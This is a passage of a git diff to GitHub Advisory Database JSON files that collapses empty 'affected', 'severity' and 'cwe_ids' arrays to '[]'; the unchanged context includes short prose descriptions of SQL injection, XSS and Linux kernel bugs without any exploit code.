a/advisories/unreviewed/2023/06/GHSA-p8fj-9p3h-h46q/GHSA-p8fj-9p3h-h46q.json +++ b/advisories/unreviewed/2023/06/GHSA-p8fj-9p3h-h46q/GHSA-p8fj-9p3h-h46q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-pggh-8r27-x766/GHSA-pggh-8r27-x766.json b/advisories/unreviewed/2023/06/GHSA-pggh-8r27-x766/GHSA-pggh-8r27-x766.json index 222bbe0a598..28d1aa61661 100644 --- a/advisories/unreviewed/2023/06/GHSA-pggh-8r27-x766/GHSA-pggh-8r27-x766.json +++ b/advisories/unreviewed/2023/06/GHSA-pggh-8r27-x766/GHSA-pggh-8r27-x766.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-pgh3-m69x-g87p/GHSA-pgh3-m69x-g87p.json b/advisories/unreviewed/2023/06/GHSA-pgh3-m69x-g87p/GHSA-pgh3-m69x-g87p.json index 5cbd1fdbf6c..70f6dd7c4d6 100644 --- a/advisories/unreviewed/2023/06/GHSA-pgh3-m69x-g87p/GHSA-pgh3-m69x-g87p.json +++ b/advisories/unreviewed/2023/06/GHSA-pgh3-m69x-g87p/GHSA-pgh3-m69x-g87p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-pgpp-8mv3-rmg6/GHSA-pgpp-8mv3-rmg6.json b/advisories/unreviewed/2023/06/GHSA-pgpp-8mv3-rmg6/GHSA-pgpp-8mv3-rmg6.json index 1d35ba9e797..8e9bd343108 100644 --- a/advisories/unreviewed/2023/06/GHSA-pgpp-8mv3-rmg6/GHSA-pgpp-8mv3-rmg6.json +++ b/advisories/unreviewed/2023/06/GHSA-pgpp-8mv3-rmg6/GHSA-pgpp-8mv3-rmg6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-qcvh-ffq5-55f3/GHSA-qcvh-ffq5-55f3.json b/advisories/unreviewed/2023/06/GHSA-qcvh-ffq5-55f3/GHSA-qcvh-ffq5-55f3.json index 238b4188a63..8a13c841201 100644 --- a/advisories/unreviewed/2023/06/GHSA-qcvh-ffq5-55f3/GHSA-qcvh-ffq5-55f3.json +++ b/advisories/unreviewed/2023/06/GHSA-qcvh-ffq5-55f3/GHSA-qcvh-ffq5-55f3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-qj32-9f3j-xp9f/GHSA-qj32-9f3j-xp9f.json b/advisories/unreviewed/2023/06/GHSA-qj32-9f3j-xp9f/GHSA-qj32-9f3j-xp9f.json index bc651a7b4d7..dbe08c30848 100644 --- a/advisories/unreviewed/2023/06/GHSA-qj32-9f3j-xp9f/GHSA-qj32-9f3j-xp9f.json +++ b/advisories/unreviewed/2023/06/GHSA-qj32-9f3j-xp9f/GHSA-qj32-9f3j-xp9f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2023/06/GHSA-qjww-gpp2-8qh6/GHSA-qjww-gpp2-8qh6.json b/advisories/unreviewed/2023/06/GHSA-qjww-gpp2-8qh6/GHSA-qjww-gpp2-8qh6.json index b446e89989f..de2a10a5066 100644 --- a/advisories/unreviewed/2023/06/GHSA-qjww-gpp2-8qh6/GHSA-qjww-gpp2-8qh6.json +++ b/advisories/unreviewed/2023/06/GHSA-qjww-gpp2-8qh6/GHSA-qjww-gpp2-8qh6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-rv4v-xv8g-p87c/GHSA-rv4v-xv8g-p87c.json b/advisories/unreviewed/2023/06/GHSA-rv4v-xv8g-p87c/GHSA-rv4v-xv8g-p87c.json index 5792106fae6..39cd238f649 100644 --- a/advisories/unreviewed/2023/06/GHSA-rv4v-xv8g-p87c/GHSA-rv4v-xv8g-p87c.json +++ b/advisories/unreviewed/2023/06/GHSA-rv4v-xv8g-p87c/GHSA-rv4v-xv8g-p87c.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-rwgh-9h84-fcv3/GHSA-rwgh-9h84-fcv3.json b/advisories/unreviewed/2023/06/GHSA-rwgh-9h84-fcv3/GHSA-rwgh-9h84-fcv3.json index 8a9ab65a8dd..b3ad4d534c7 100644 --- a/advisories/unreviewed/2023/06/GHSA-rwgh-9h84-fcv3/GHSA-rwgh-9h84-fcv3.json +++ b/advisories/unreviewed/2023/06/GHSA-rwgh-9h84-fcv3/GHSA-rwgh-9h84-fcv3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-vpj3-j2jm-qp35/GHSA-vpj3-j2jm-qp35.json b/advisories/unreviewed/2023/06/GHSA-vpj3-j2jm-qp35/GHSA-vpj3-j2jm-qp35.json index 9746acef3f9..117c20aaf14 100644 --- a/advisories/unreviewed/2023/06/GHSA-vpj3-j2jm-qp35/GHSA-vpj3-j2jm-qp35.json +++ b/advisories/unreviewed/2023/06/GHSA-vpj3-j2jm-qp35/GHSA-vpj3-j2jm-qp35.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-w2x2-g32p-v8fp/GHSA-w2x2-g32p-v8fp.json b/advisories/unreviewed/2023/06/GHSA-w2x2-g32p-v8fp/GHSA-w2x2-g32p-v8fp.json index 8a297247b22..a12f0d93893 100644 --- a/advisories/unreviewed/2023/06/GHSA-w2x2-g32p-v8fp/GHSA-w2x2-g32p-v8fp.json +++ b/advisories/unreviewed/2023/06/GHSA-w2x2-g32p-v8fp/GHSA-w2x2-g32p-v8fp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-w3gq-j6r5-7rw6/GHSA-w3gq-j6r5-7rw6.json b/advisories/unreviewed/2023/06/GHSA-w3gq-j6r5-7rw6/GHSA-w3gq-j6r5-7rw6.json index 273b5f648d4..54e39089dbe 100644 --- a/advisories/unreviewed/2023/06/GHSA-w3gq-j6r5-7rw6/GHSA-w3gq-j6r5-7rw6.json +++ b/advisories/unreviewed/2023/06/GHSA-w3gq-j6r5-7rw6/GHSA-w3gq-j6r5-7rw6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-w8vw-44wp-qv75/GHSA-w8vw-44wp-qv75.json b/advisories/unreviewed/2023/06/GHSA-w8vw-44wp-qv75/GHSA-w8vw-44wp-qv75.json index 5edae906b13..7e92553b7e2 100644 --- a/advisories/unreviewed/2023/06/GHSA-w8vw-44wp-qv75/GHSA-w8vw-44wp-qv75.json +++ b/advisories/unreviewed/2023/06/GHSA-w8vw-44wp-qv75/GHSA-w8vw-44wp-qv75.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-wcg5-6pc8-hjf5/GHSA-wcg5-6pc8-hjf5.json b/advisories/unreviewed/2023/06/GHSA-wcg5-6pc8-hjf5/GHSA-wcg5-6pc8-hjf5.json index 7d0097cf163..8e21df766cc 100644 --- a/advisories/unreviewed/2023/06/GHSA-wcg5-6pc8-hjf5/GHSA-wcg5-6pc8-hjf5.json +++ b/advisories/unreviewed/2023/06/GHSA-wcg5-6pc8-hjf5/GHSA-wcg5-6pc8-hjf5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-xjqm-c5w6-2r9x/GHSA-xjqm-c5w6-2r9x.json b/advisories/unreviewed/2023/06/GHSA-xjqm-c5w6-2r9x/GHSA-xjqm-c5w6-2r9x.json index 68aa0c946bd..9514dffe2e7 100644 --- a/advisories/unreviewed/2023/06/GHSA-xjqm-c5w6-2r9x/GHSA-xjqm-c5w6-2r9x.json +++ b/advisories/unreviewed/2023/06/GHSA-xjqm-c5w6-2r9x/GHSA-xjqm-c5w6-2r9x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/06/GHSA-xvm4-hfq6-6r23/GHSA-xvm4-hfq6-6r23.json b/advisories/unreviewed/2023/06/GHSA-xvm4-hfq6-6r23/GHSA-xvm4-hfq6-6r23.json index 5856c161972..aa1f9b146b9 100644 --- a/advisories/unreviewed/2023/06/GHSA-xvm4-hfq6-6r23/GHSA-xvm4-hfq6-6r23.json +++ b/advisories/unreviewed/2023/06/GHSA-xvm4-hfq6-6r23/GHSA-xvm4-hfq6-6r23.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/07/GHSA-49w5-c2q7-xqvq/GHSA-49w5-c2q7-xqvq.json b/advisories/unreviewed/2023/07/GHSA-49w5-c2q7-xqvq/GHSA-49w5-c2q7-xqvq.json index 2fce03d17c6..4794194f313 100644 --- a/advisories/unreviewed/2023/07/GHSA-49w5-c2q7-xqvq/GHSA-49w5-c2q7-xqvq.json +++ b/advisories/unreviewed/2023/07/GHSA-49w5-c2q7-xqvq/GHSA-49w5-c2q7-xqvq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/07/GHSA-7qjv-w2hr-5g2v/GHSA-7qjv-w2hr-5g2v.json b/advisories/unreviewed/2023/07/GHSA-7qjv-w2hr-5g2v/GHSA-7qjv-w2hr-5g2v.json index 914b9f92f0b..62e588fa174 100644 --- a/advisories/unreviewed/2023/07/GHSA-7qjv-w2hr-5g2v/GHSA-7qjv-w2hr-5g2v.json +++ b/advisories/unreviewed/2023/07/GHSA-7qjv-w2hr-5g2v/GHSA-7qjv-w2hr-5g2v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/07/GHSA-vgh6-qcg3-p3mf/GHSA-vgh6-qcg3-p3mf.json b/advisories/unreviewed/2023/07/GHSA-vgh6-qcg3-p3mf/GHSA-vgh6-qcg3-p3mf.json index 41c4d593ed2..465caa1d67e 100644 --- a/advisories/unreviewed/2023/07/GHSA-vgh6-qcg3-p3mf/GHSA-vgh6-qcg3-p3mf.json +++ b/advisories/unreviewed/2023/07/GHSA-vgh6-qcg3-p3mf/GHSA-vgh6-qcg3-p3mf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/10/GHSA-26rx-wm6q-f3g4/GHSA-26rx-wm6q-f3g4.json b/advisories/unreviewed/2023/10/GHSA-26rx-wm6q-f3g4/GHSA-26rx-wm6q-f3g4.json index c93a6668867..ceb16bc5d7f 100644 --- a/advisories/unreviewed/2023/10/GHSA-26rx-wm6q-f3g4/GHSA-26rx-wm6q-f3g4.json +++ b/advisories/unreviewed/2023/10/GHSA-26rx-wm6q-f3g4/GHSA-26rx-wm6q-f3g4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/01/GHSA-wmcg-jxc8-7m7p/GHSA-wmcg-jxc8-7m7p.json b/advisories/unreviewed/2024/01/GHSA-wmcg-jxc8-7m7p/GHSA-wmcg-jxc8-7m7p.json index 15d9481a49a..7dc63df8366 100644 --- a/advisories/unreviewed/2024/01/GHSA-wmcg-jxc8-7m7p/GHSA-wmcg-jxc8-7m7p.json +++ b/advisories/unreviewed/2024/01/GHSA-wmcg-jxc8-7m7p/GHSA-wmcg-jxc8-7m7p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/02/GHSA-57p5-7r24-7vg9/GHSA-57p5-7r24-7vg9.json b/advisories/unreviewed/2024/02/GHSA-57p5-7r24-7vg9/GHSA-57p5-7r24-7vg9.json index 3d6ea46245d..083f6c71bd2 100644 --- a/advisories/unreviewed/2024/02/GHSA-57p5-7r24-7vg9/GHSA-57p5-7r24-7vg9.json +++ b/advisories/unreviewed/2024/02/GHSA-57p5-7r24-7vg9/GHSA-57p5-7r24-7vg9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/02/GHSA-cmcg-2f4m-gjq8/GHSA-cmcg-2f4m-gjq8.json b/advisories/unreviewed/2024/02/GHSA-cmcg-2f4m-gjq8/GHSA-cmcg-2f4m-gjq8.json index af3a0e27022..b58805b65de 100644 --- a/advisories/unreviewed/2024/02/GHSA-cmcg-2f4m-gjq8/GHSA-cmcg-2f4m-gjq8.json +++ b/advisories/unreviewed/2024/02/GHSA-cmcg-2f4m-gjq8/GHSA-cmcg-2f4m-gjq8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/02/GHSA-hg82-gwpx-6h36/GHSA-hg82-gwpx-6h36.json b/advisories/unreviewed/2024/02/GHSA-hg82-gwpx-6h36/GHSA-hg82-gwpx-6h36.json index 40c58d8ecf4..65146592d35 100644 --- a/advisories/unreviewed/2024/02/GHSA-hg82-gwpx-6h36/GHSA-hg82-gwpx-6h36.json +++ b/advisories/unreviewed/2024/02/GHSA-hg82-gwpx-6h36/GHSA-hg82-gwpx-6h36.json @@ -7,12 +7,8 @@ "CVE-2024-24100" ], "details": "Code-projects Computer Book Store 1.0 is vulnerable to SQL Injection via PublisherID.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -24,9 +20,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/03/GHSA-3fv7-f54h-j866/GHSA-3fv7-f54h-j866.json b/advisories/unreviewed/2024/03/GHSA-3fv7-f54h-j866/GHSA-3fv7-f54h-j866.json index ff6cc95017d..7c9327a3ea7 100644 --- a/advisories/unreviewed/2024/03/GHSA-3fv7-f54h-j866/GHSA-3fv7-f54h-j866.json +++ b/advisories/unreviewed/2024/03/GHSA-3fv7-f54h-j866/GHSA-3fv7-f54h-j866.json @@ -7,12 +7,8 @@ "CVE-2024-26623" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\npds_core: Prevent race issues involving the adminq\n\nThere are multiple paths that can result in using the pdsc's\nadminq.\n\n[1] pdsc_adminq_isr and the resulting work from queue_work(),\n i.e. pdsc_work_thread()->pdsc_process_adminq()\n\n[2] pdsc_adminq_post()\n\nWhen the device goes through reset via PCIe reset and/or\na fw_down/fw_up cycle due to bad PCIe state or bad device\nstate the adminq is destroyed and recreated.\n\nA NULL pointer dereference can happen if [1] or [2] happens\nafter the adminq is already destroyed.\n\nIn order to fix this, add some further state checks and\nimplement reference counting for adminq uses. Reference\ncounting was used because multiple threads can attempt to\naccess the adminq at the same time via [1] or [2]. Additionally,\nmultiple clients (i.e. pds-vfio-pci) can be using [2]\nat the same time.\n\nThe adminq_refcnt is initialized to 1 when the adminq has been\nallocated and is ready to use. Users/clients of the adminq\n(i.e. [1] and [2]) will increment the refcnt when they are using\nthe adminq. When the driver goes into a fw_down cycle it will\nset the PDSC_S_FW_DEAD bit and then wait for the adminq_refcnt\nto hit 1. Setting the PDSC_S_FW_DEAD before waiting will prevent\nany further adminq_refcnt increments. Waiting for the\nadminq_refcnt to hit 1 allows for any current users of the adminq\nto finish before the driver frees the adminq. Once the\nadminq_refcnt hits 1 the driver clears the refcnt to signify that\nthe adminq is deleted and cannot be used. On the fw_up cycle the\ndriver will once again initialize the adminq_refcnt to 1 allowing\nthe adminq to be used again.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/03/GHSA-444h-7m84-gc93/GHSA-444h-7m84-gc93.json b/advisories/unreviewed/2024/03/GHSA-444h-7m84-gc93/GHSA-444h-7m84-gc93.json index c6d7bdaab30..b56f6878b45 100644 --- a/advisories/unreviewed/2024/03/GHSA-444h-7m84-gc93/GHSA-444h-7m84-gc93.json +++ b/advisories/unreviewed/2024/03/GHSA-444h-7m84-gc93/GHSA-444h-7m84-gc93.json @@ -7,12 +7,8 @@ "CVE-2023-52588" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nf2fs: fix to tag gcing flag on page during block migration\n\nIt needs to add missing gcing flag on page during block migration,\nin order to garantee migrated data be persisted during checkpoint,\notherwise out-of-order persistency between data and node may cause\ndata corruption after SPOR.\n\nSimilar issue was fixed by commit 2d1fe8a86bf5 (\"f2fs: fix to tag\ngcing flag on page during file defragment\").", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/03/GHSA-4r36-f255-mccm/GHSA-4r36-f255-mccm.json b/advisories/unreviewed/2024/03/GHSA-4r36-f255-mccm/GHSA-4r36-f255-mccm.json index 4ead1af6c2d..2bb347a5bae 100644 --- a/advisories/unreviewed/2024/03/GHSA-4r36-f255-mccm/GHSA-4r36-f255-mccm.json +++ b/advisories/unreviewed/2024/03/GHSA-4r36-f255-mccm/GHSA-4r36-f255-mccm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-5g62-9q93-xrv9/GHSA-5g62-9q93-xrv9.json b/advisories/unreviewed/2024/03/GHSA-5g62-9q93-xrv9/GHSA-5g62-9q93-xrv9.json index 4aa51584667..e6ab169632a 100644 --- a/advisories/unreviewed/2024/03/GHSA-5g62-9q93-xrv9/GHSA-5g62-9q93-xrv9.json +++ b/advisories/unreviewed/2024/03/GHSA-5g62-9q93-xrv9/GHSA-5g62-9q93-xrv9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-5v2f-93mx-7r24/GHSA-5v2f-93mx-7r24.json b/advisories/unreviewed/2024/03/GHSA-5v2f-93mx-7r24/GHSA-5v2f-93mx-7r24.json index 77333a6eeb9..4916ac55d46 100644 --- a/advisories/unreviewed/2024/03/GHSA-5v2f-93mx-7r24/GHSA-5v2f-93mx-7r24.json +++ b/advisories/unreviewed/2024/03/GHSA-5v2f-93mx-7r24/GHSA-5v2f-93mx-7r24.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-6w43-jrpg-hc48/GHSA-6w43-jrpg-hc48.json b/advisories/unreviewed/2024/03/GHSA-6w43-jrpg-hc48/GHSA-6w43-jrpg-hc48.json index 41fc2958cd2..9a23e4378b6 100644 --- a/advisories/unreviewed/2024/03/GHSA-6w43-jrpg-hc48/GHSA-6w43-jrpg-hc48.json +++ b/advisories/unreviewed/2024/03/GHSA-6w43-jrpg-hc48/GHSA-6w43-jrpg-hc48.json @@ -7,12 +7,8 @@ "CVE-2024-24389" ], "details": "A cross-site scripting (XSS) vulnerability in XunRuiCMS up to v4.6.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Add Column Name parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -24,9 +20,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/03/GHSA-727x-m5xv-m6gq/GHSA-727x-m5xv-m6gq.json b/advisories/unreviewed/2024/03/GHSA-727x-m5xv-m6gq/GHSA-727x-m5xv-m6gq.json index 593017b3a59..dddc5ba1c3d 100644 --- a/advisories/unreviewed/2024/03/GHSA-727x-m5xv-m6gq/GHSA-727x-m5xv-m6gq.json +++ b/advisories/unreviewed/2024/03/GHSA-727x-m5xv-m6gq/GHSA-727x-m5xv-m6gq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-9q37-6mpp-rv7v/GHSA-9q37-6mpp-rv7v.json b/advisories/unreviewed/2024/03/GHSA-9q37-6mpp-rv7v/GHSA-9q37-6mpp-rv7v.json index 563eb2b88c6..56c720dfc50 100644 --- a/advisories/unreviewed/2024/03/GHSA-9q37-6mpp-rv7v/GHSA-9q37-6mpp-rv7v.json +++ b/advisories/unreviewed/2024/03/GHSA-9q37-6mpp-rv7v/GHSA-9q37-6mpp-rv7v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "WEB", diff --git a/advisories/unreviewed/2024/03/GHSA-cv5f-f45r-4cqf/GHSA-cv5f-f45r-4cqf.json b/advisories/unreviewed/2024/03/GHSA-cv5f-f45r-4cqf/GHSA-cv5f-f45r-4cqf.json index df330d5adc5..ee70ca2edad 100644 --- a/advisories/unreviewed/2024/03/GHSA-cv5f-f45r-4cqf/GHSA-cv5f-f45r-4cqf.json +++ b/advisories/unreviewed/2024/03/GHSA-cv5f-f45r-4cqf/GHSA-cv5f-f45r-4cqf.json @@ -7,12 +7,8 @@ "CVE-2023-52586" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/msm/dpu: Add mutex lock in control vblank irq\n\nAdd a mutex lock to control vblank irq to synchronize vblank\nenable/disable operations happening from different threads to prevent\nrace conditions while registering/unregistering the vblank irq callback.\n\nv4: -Removed vblank_ctl_lock from dpu_encoder_virt, so it is only a\n parameter of dpu_encoder_phys.\n -Switch from atomic refcnt to a simple int counter as mutex has\n now been added\nv3: Mistakenly did not change wording in last version. It is done now.\nv2: Slightly changed wording of commit message\n\nPatchwork: https://patchwork.freedesktop.org/patch/571854/", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/03/GHSA-ffqx-hmw2-p5jv/GHSA-ffqx-hmw2-p5jv.json b/advisories/unreviewed/2024/03/GHSA-ffqx-hmw2-p5jv/GHSA-ffqx-hmw2-p5jv.json index f838107ab37..b758261d5f9 100644 --- a/advisories/unreviewed/2024/03/GHSA-ffqx-hmw2-p5jv/GHSA-ffqx-hmw2-p5jv.json +++ b/advisories/unreviewed/2024/03/GHSA-ffqx-hmw2-p5jv/GHSA-ffqx-hmw2-p5jv.json @@ -7,12 +7,8 @@ "CVE-2023-52596" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nsysctl: Fix out of bounds access for empty sysctl registers\n\nWhen registering tables to the sysctl subsystem there is a check to see\nif header is a permanently empty directory (used for mounts). This check\nevaluates the first element of the ctl_table. This results in an out of\nbounds evaluation when registering empty directories.\n\nThe function register_sysctl_mount_point now passes a ctl_table of size\n1 instead of size 0. It now relies solely on the type to identify\na permanently empty register.\n\nMake sure that the ctl_table has at least one element before testing for\npermanent emptiness.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/03/GHSA-hf75-xw57-474f/GHSA-hf75-xw57-474f.json b/advisories/unreviewed/2024/03/GHSA-hf75-xw57-474f/GHSA-hf75-xw57-474f.json index 0771db1ba01..8683be1397e 100644 --- a/advisories/unreviewed/2024/03/GHSA-hf75-xw57-474f/GHSA-hf75-xw57-474f.json +++ b/advisories/unreviewed/2024/03/GHSA-hf75-xw57-474f/GHSA-hf75-xw57-474f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-j296-jhq5-3x6c/GHSA-j296-jhq5-3x6c.json b/advisories/unreviewed/2024/03/GHSA-j296-jhq5-3x6c/GHSA-j296-jhq5-3x6c.json index ffb35d2349d..653086bf0a6 100644 --- a/advisories/unreviewed/2024/03/GHSA-j296-jhq5-3x6c/GHSA-j296-jhq5-3x6c.json +++ b/advisories/unreviewed/2024/03/GHSA-j296-jhq5-3x6c/GHSA-j296-jhq5-3x6c.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-rhvr-vw4q-5vc6/GHSA-rhvr-vw4q-5vc6.json b/advisories/unreviewed/2024/03/GHSA-rhvr-vw4q-5vc6/GHSA-rhvr-vw4q-5vc6.json index 7bca3bf34eb..000f96733ac 100644 --- a/advisories/unreviewed/2024/03/GHSA-rhvr-vw4q-5vc6/GHSA-rhvr-vw4q-5vc6.json +++ b/advisories/unreviewed/2024/03/GHSA-rhvr-vw4q-5vc6/GHSA-rhvr-vw4q-5vc6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git 